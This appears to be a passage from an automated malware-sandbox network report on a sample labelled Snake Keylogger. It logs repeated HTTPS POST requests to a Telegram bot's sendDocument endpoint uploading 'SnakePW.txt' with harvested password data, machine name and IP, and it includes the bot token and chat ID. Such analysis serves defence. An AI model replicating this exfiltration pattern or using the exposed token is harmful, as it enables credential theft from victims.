                            2022-06-26 07:32:40 UTC8OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 35 37 61 65 34 38 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d57ae485Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:40 UTC9INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:40 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:40 UTC9INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66751,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228760,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            50192.168.2.549829149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:00 UTC84OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e13958ac
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:00 UTC84OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 33 39 35 38 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e13958acContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:00 UTC85INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:00 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:00 UTC85INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66799,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228780,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            51192.168.2.549830149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:00 UTC86OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e16dcca0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:00 UTC86OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 36 64 63 63 61 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e16dcca0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:00 UTC86INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:00 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:00 UTC87INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66800,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228780,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            52192.168.2.549833149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:00 UTC87OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e1abc791
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:00 UTC88OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 61 62 63 37 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e1abc791Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:01 UTC88INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:01 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:01 UTC89INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66801,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228781,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            53192.168.2.549838149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:01 UTC89OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e1e9c42e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:01 UTC89OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 31 65 39 63 34 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e1e9c42eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:01 UTC90INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:01 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:01 UTC90INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66802,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228781,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            54192.168.2.549841149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:01 UTC91OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e22c895b
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:01 UTC91OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 32 63 38 39 35 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e22c895bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:01 UTC92INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:01 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:01 UTC92INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66803,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228781,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            55192.168.2.549844149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:02 UTC92OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e2635c53
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:02 UTC93OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 36 33 35 63 35 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e2635c53Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:02 UTC93INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:02 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:02 UTC94INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 38 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66805,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228782,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            56192.168.2.549847149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:02 UTC94OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756e2a8802e
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:02 UTC94OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 65 32 61 38 38 30 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756e2a8802eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:02 UTC95INHTTP/1.1 200 OK
